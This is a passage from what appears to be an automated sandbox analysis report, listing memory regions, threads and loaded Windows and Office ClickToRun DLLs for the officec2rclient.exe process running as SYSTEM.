end_va = 0xcc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cc0000" filename = "" Region: id = 4808 start_va = 0x2df0000 end_va = 0x2eeffff entry_point = 0x0 region_type = private name = "private_0x0000000002df0000" filename = "" Region: id = 4809 start_va = 0x2ef0000 end_va = 0x32effff entry_point = 0x0 region_type = private name = "private_0x0000000002ef0000" filename = "" Region: id = 4810 start_va = 0x7fefcf10000 end_va = 0x7fefcf2afff entry_point = 0x7fefcf10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4811 start_va = 0x7fefcf30000 end_va = 0x7fefcf4dfff entry_point = 0x7fefcf30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4812 start_va = 0x7fefd0c0000 end_va = 0x7fefd10bfff entry_point = 0x7fefd0c0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4813 start_va = 0x7fefd210000 end_va = 0x7fefd266fff entry_point = 0x7fefd210000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 4814 start_va = 0x7fefd5f0000 end_va = 0x7fefd611fff entry_point = 0x7fefd5f0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4815 start_va = 0x7fefd620000 end_va = 0x7fefd66dfff entry_point = 0x7fefd620000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 4816 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Thread: id = 196 os_tid = 0x4d8 Thread: id = 253 os_tid = 0x418 Thread: id = 255 os_tid = 0x804 Thread: id = 259 os_tid = 0x410 Thread: id = 260 os_tid = 0x350 Thread: id = 262 os_tid = 0x864 Thread: id = 264 os_tid = 0x860 Thread: id = 266 os_tid = 0x968 Thread: id = 268 os_tid = 0x850 Thread: id = 269 os_tid = 0x7dc Thread: id = 270 os_tid = 0x134 Thread: id = 274 os_tid = 0x64c Thread: id = 281 os_tid = 0x940 Thread: id = 293 os_tid = 0x838 Thread: id = 298 os_tid = 0x984 Process: id = "31" image_name = "officec2rclient.exe" filename = "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe" page_root = "0x6ad10000" os_pid = "0x5b4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0xa58" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\" /WatchService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d435" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 3880 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3881 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3882 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 3883 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 3884 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3885 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3886 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3887 start_va = 0x13ff30000 end_va = 0x140f72fff entry_point = 0x13ff30000 region_type = mapped_file name = "officec2rclient.exe" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe") Region: id = 3888 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3889 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3890 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 3891 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4151 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 4152 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4153 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4154 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4155 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4156 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 4157 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 4158 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4159 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4160 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4161 start_va = 0x7fef30d0000 end_va = 0x7fef30f6fff entry_point = 0x7fef30d0000 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 4162 start_va = 0x7fef38b0000 end_va = 0x7fef3900fff entry_point = 0x7fef38b0000 region_type = mapped_file name = "concrt140.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll") Region: id = 4163 start_va = 0x7fef7a40000 end_va = 0x7fef7ab5fff entry_point = 0x7fef7a40000 region_type = mapped_file name = "apiclient.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll") Region: id = 4164 start_va = 0x7fef7b00000 end_va = 0x7fef7b02fff entry_point = 0x7fef7b00000 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 4165 start_va = 0x7fef7b10000 end_va = 0x7fef7b12fff entry_point = 0x7fef7b10000 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 4166 start_va = 0x7fef7b20000 end_va = 0x7fef7b22fff entry_point = 0x7fef7b20000 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 4167 start_va = 0x7fef7b30000 end_va = 0x7fef7b32fff entry_point = 0x7fef7b30000 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 4168 start_va = 0x7fef7b40000 end_va = 0x7fef7b44fff entry_point = 0x7fef7b40000 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 4169 start_va = 0x7fef7b50000 end_va = 0x7fef7b54fff entry_point = 0x7fef7b50000 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 4170 start_va = 0x7fef7b60000 end_va = 0x7fef7b62fff entry_point = 0x7fef7b60000 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 4171 start_va = 0x7fef7b70000 end_va = 0x7fef7c0cfff entry_point = 0x7fef7b70000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll") Region: id = 4172 start_va = 0x7fef7c10000 end_va = 0x7fef7c13fff entry_point = 0x7fef7c10000 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 4173 start_va = 0x7fef7c20000 end_va = 0x7fef7c23fff entry_point = 0x7fef7c20000 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 4174 start_va = 0x7fef7c30000 end_va = 0x7fef7c32fff entry_point = 0x7fef7c30000 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 4175 start_va = 0x7fef7c40000 end_va = 0x7fef7c43fff entry_point = 0x7fef7c40000 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 4176 start_va = 0x7fef7c50000 end_va = 0x7fef7c52fff entry_point = 0x7fef7c50000 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll") Region: id = 4177 start_va = 0x7fef7c60000 end_va = 0x7fef7c62fff entry_point = 0x7fef7c60000 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 4178 start_va = 0x7fef7c70000 end_va = 0x7fef7c72fff entry_point = 0x7fef7c70000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 4179 start_va = 0x7fef7c80000 end_va = 0x7fef7c82fff entry_point = 0x7fef7c80000 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 4180 start_va = 0x7fef7c90000 end_va = 0x7fef7c92fff entry_point = 0x7fef7c90000 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll") Region: id = 4181 start_va = 0x7fef7ca0000 end_va = 0x7fef7ca2fff entry_point = 0x7fef7ca0000 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 4182 start_va = 0x7fef7cb0000 end_va = 0x7fef7da1fff entry_point = 0x7fef7cb0000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll") Region: id = 4183 start_va = 0x7fef7db0000 end_va = 0x7fef7db3fff entry_point = 0x7fef7db0000 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 4184 start_va = 0x7fef7dc0000 end_va = 0x7fef7dd6fff entry_point = 0x7fef7dc0000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll") Region: id = 4185 start_va = 0x7fef7de0000 end_va = 0x7fef7dfafff entry_point = 0x7fef7de0000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 4186 start_va = 0x7fef8360000 end_va = 0x7fef8366fff entry_point = 0x7fef8360000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 4187 start_va = 0x7fef8b10000 end_va = 0x7fef8b8bfff entry_point = 0x7fef8b10000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 4188 start_va = 0x7fef9320000 end_va = 0x7fef933dfff entry_point = 0x7fef9320000 region_type = mapped_file name = "hlink.dll" filename = "\\Windows\\System32\\hlink.dll" (normalized: "c:\\windows\\system32\\hlink.dll") Region: id = 4189 start_va = 0x7fefb730000 end_va = 0x7fefb73afff entry_point = 0x7fefb730000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 4190 start_va = 0x7fefbee0000 end_va = 0x7fefbef0fff entry_point = 0x7fefbee0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4191 start_va = 0x7fefc290000 end_va = 0x7fefc4a4fff entry_point = 0x7fefc290000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 4192 start_va = 0x7fefdc30000 end_va = 0x7fefdc3efff entry_point = 0x7fefdc30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4193 start_va = 0x7fefdce0000 end_va = 0x7fefdd15fff entry_point = 0x7fefdce0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4194 start_va = 0x7fefdd20000 end_va = 0x7fefdd59fff entry_point = 0x7fefdd20000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 4195 start_va = 0x7fefddd0000 end_va = 0x7fefdde9fff entry_point = 0x7fefddd0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 4196 start_va = 0x7fefddf0000 end_va = 0x7fefdf56fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4197 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4198 start_va = 0x7fefdfd0000 end_va = 0x7fefed57fff entry_point = 0x7fefdfd0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4199 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4200 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4201 start_va = 0x7feff2f0000 end_va = 0x7feff4c6fff entry_point = 0x7feff2f0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 4202 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4203 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4204 start_va = 0x7feff640000 end_va = 0x7feff6b0fff entry_point = 0x7feff640000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4205 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4206 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4207 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4208 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4521 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4522 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4523 start_va = 0x1d0000 end_va = 0x1d6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 4524 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4525 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4526 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4527 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 4528 start_va = 0x4c0000 end_va = 0x647fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 4529 start_va = 0x650000 end_va = 0x7d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 4530 start_va = 0x7e0000 end_va = 0x89ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 4531 start_va = 0x8a0000 end_va = 0xc92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 4532 start_va = 0xd60000 end_va = 0xddffff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 4533 start_va = 0xde0000 end_va = 0x10aefff entry_point = 0xde0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4534 start_va = 0x7fef3440000 end_va = 0x7fef3521fff entry_point = 0x7fef3440000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 4535 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4536 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4537 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4556 start_va = 0xd40000 end_va = 0xd4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 4557 start_va = 0x10b0000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 4558 start_va = 0x1230000 end_va = 0x132ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 4559 start_va = 0x1390000 end_va = 0x148ffff entry_point = 0x0 region_type = private name = "private_0x0000000001390000" filename = "" Region: id = 4560 start_va = 0x7fef9190000 end_va = 0x7fef922ffff entry_point = 0x7fef9190000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 4561 start_va = 0x7fef9810000 end_va = 0x7fef98b6fff entry_point = 0x7fef9810000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 4562 start_va = 0x7fefc080000 end_va = 0x7fefc097fff entry_point = 0x7fefc080000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 4563 start_va = 0x7fefcd50000 end_va = 0x7fefcd5bfff entry_point = 0x7fefcd50000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4564 start_va = 0x7fefdb30000 end_va = 0x7fefdb6cfff entry_point = 0x7fefdb30000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4565 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 4566 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 4567 start_va = 0x7fefa750000 end_va = 0x7fefaa65fff entry_point = 0x7fefa750000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 4621 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 4622 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 4623 start_va = 0x250000 end_va = 0x251fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 4624 start_va = 0x260000 end_va = 0x267fff entry_point = 0x260000 region_type = mapped_file name = "index.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 4625 start_va = 0x270000 end_va = 0x271fff entry_point = 0x0 region_type = 